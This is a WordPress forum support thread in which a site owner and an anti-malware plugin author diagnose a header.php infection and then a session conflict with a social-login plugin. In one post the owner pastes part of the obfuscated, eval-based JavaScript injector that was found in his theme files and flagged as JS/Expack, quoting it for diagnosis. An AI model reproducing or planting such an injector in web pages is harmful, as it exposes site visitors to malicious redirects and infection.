WordPress.org

Ready to get started?Download WordPress

Forums

Anti-Malware (Get Off Malicious Scripts)
[resolved] some virus block me to access the site (18 posts)

  1. sonnycool
    Member
    Posted 1 year ago #

    i running wpms, i can access the site with no problem, but some sub domain seem like having problem.
    On main site (http://pgpropertyagent.com), i can scan the all files and found no issue but google and firefox is blocking it now ....

    for example :
    andyloke.pgpropertyagent.com
    douglas.pgpropertyagent.com

    thanks

    http://wordpress.org/extend/plugins/gotmls/

  2. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    This looks like a new threat that is not in my definitions yet. I you would be willing to give me WP Admin access to one of your infected sites I will find this new threat and add it to my definition update so that it can be automatically removed.

    You can email the login in directly to me: eli at gotmls dot net

    Aloha, Eli

  3. sonnycool
    Member
    Posted 1 year ago #

    i just solve it with very traditional way, i download every folder from ftp to my desktop and my pc antivirus do detecting job ...

    base on my desktop antivirus :
    virus name : JS/Expack.CM.3
    injected in all my theme header.php files,
    hopefully i really solve it, u still need access to take a lot ?
    thanks

    suspected code provide by google webmaster :

    <script type="text/javascript" language="javascript" >
    
    ps="split";e=eval;v="0x";a=0;z="y";try{a*=25}catch(zz){a=1}i
    f(!a){try{--e("doc"+"ument")["bod"+z]}catch(q){a2="_";sa=0xa
    -02;}z="28_6e_7d_76_6b_7c_71_77_76_28_82_82_82_6e_6e_6e_30_3
    1_28_83_15_12_28_7e_69_7a_28_7c_7a_6c_79_7a_28_45_28_6c_77_6
    b_7d_75_6d_76_7c_36_6b_7a_6d_69_7c_6d_4d_74_6d_75_6d_76_7c_3
    0_2f_71_6e_7a_69_75_6d_2f_31_43_15_12_15_12_28_7c_7a_6c_79_7
    a_36_7b_7a_6b_28_45_28_2f_70_7c_7c_78_42_37_37_7c_6a_69_36_7
    2_78_37_78_70_77_7c_77_37_7c_7a_69_6e_36_78_70_78_2f_43_15_1
    2_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_78_77_7b_71_7c_71_7
    7_76_28_45_28_2f_69_6a_7b_77_74_7d_7c_6d_2f_43_15_12_28_7c_7
    a_6c_79_7a_36_7b_7c_81_74_6d_36_6a_77_7a_6c_6d_7a_28_45_28_2
    f_38_2f_43_15_12_28_7c_7a_6c_79_7a_36_7b_7c_81_74_6d_36_70_6
  4. sonnycool
    Member
    Posted 1 year ago #

    or u can visit here for detail in their cache system :
    http://sitecheck.sucuri.net/results/douglasyeap.pgpropertyagent.com/
    the main site already rescan without issue now ..

  5. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    I would still like access to an infected site so I can see the infection in-place and test my own removal code. If you don't have a site I can login to can you send me one of your infected hearder.php files?

  6. sonnycool
    Member
    Posted 1 year ago #

    i don't have the files anymore (cause my pc block it).

    I add and create you as my site admin now, remember my site is wpms :)
    account created :)

  7. sonnycool
    Member
    Posted 1 year ago #

    email you ftp access too :)

  8. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks for the access but it looks like you have already cleaned the infection out of your header. Do you have any sites that are still infected with this threat?

  9. sonnycool
    Member
    Posted 1 year ago #

    unfortunately no (lucky me) ...
    I think the problem should be on scanning not db, cause i recall your scanner detect the virus but only one files header.php (i have 4 header.php), but that header.php detect is the only theme that not using at all ....

  10. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    Thanks for working with me on this and giving me access to your site. Based on the malicious code snippet you posted, and the files in your quarantine, I do think this malware is in my definitions already.

    Please keep a close eye on your site for a few days to make sure the infection does not come back. If you do get re-infected, and hope you don't, but if you do, please let me know right away and I will look for the source of the infection too.

    Aloha, Eli

  11. sonnycool
    Member
    Posted 1 year ago #

    seem like you plugin is conflict with wp social login.
    i try diagnose and think this is the issue :
    cookie save here /public_html/wp-content/plugins/gotmls/images/

  12. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    WordPress does not handle sessions well, and some servers I've found don't even have a session path, so I have added this to the top of my gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    If this line is infact causing an issue I will have to look for another way to fix the no-session issue. Can you rem out that line and let me know if it solves the issue?

    Also, what are the symptoms you are experiencing due to this conflict?

  13. sonnycool
    Member
    Posted 1 year ago #

    symptoms :
    when click on social login, new screen pop up -> redirect to this page : http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    with your plugin -> You cannot access this page directly.
    without your plugin -> redirect to social network API or login page.

    below is my website info with and without your plugin :
    without (different part) :

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    with your plugin :

    SESSION:                  Enabled
    SESSION:WSL               WordPress Social Login 2.1.4
    SESSION:NAME:             PHPSESSID
    
    COOKIE PATH:              /
    SAVE PATH:                /home/xxx/domains/domain.com/public_html/wp-content/plugins/gotmls/images/
    USE COOKIES:              On
    USE ONLY COOKIES:         Off

    hope this help ..

  14. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    That message is from /public_html/wp-content/plugins/wordpress-social-login/hybridauth/Hybrid/Endpoint.php

    I was getting that error "You cannot access this page directly" with or without my plugin enabled. I tried remming out that first line of my plugin that changes the session path and nothing seems any different.

    Can you show me a working redirect without my plugin enabled so that I can see the difference?

  15. sonnycool
    Member
    Posted 1 year ago #

    u can visit my site, i just try, is working now :)

  16. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    When I go to:
    http://pgpropertyagent.com/wp-content/plugins/wordpress-social-login/hybridauth/?hauth.start=Live&hauth.time=1374262225
    I still get:
    "You cannot access this page directly."

    What URL can I use to see it working like you see it?

  17. sonnycool
    Member
    Posted 1 year ago #

    go my site pgpropertyagent.com -> footer - > click on social icon (fb, google, msn, yahoo), screen popup .....

    u still have my access right ?
    if u activate your plugin, after click -> pop up -> stop there ...

  18. Eli
    Member
    Plugin Author

    Posted 1 year ago #

    so I have removed this line at the top of the gotmls/images/index.php file in my plugin:
    if(!session_save_path()) session_save_path(dirname(__FILE__).'/');

    This line is infact the cause the issue with your login widget. I will not have this line in my next release of the plugin as I think it is an obsolete fix for servers without session folders.

    Please try it out and let me know if you have any more problems with it the way it is now.

    Aloha, Eli

Topic Closed

This topic has been closed to new replies.

About this Plugin

About this Topic

Tags

No tags yet.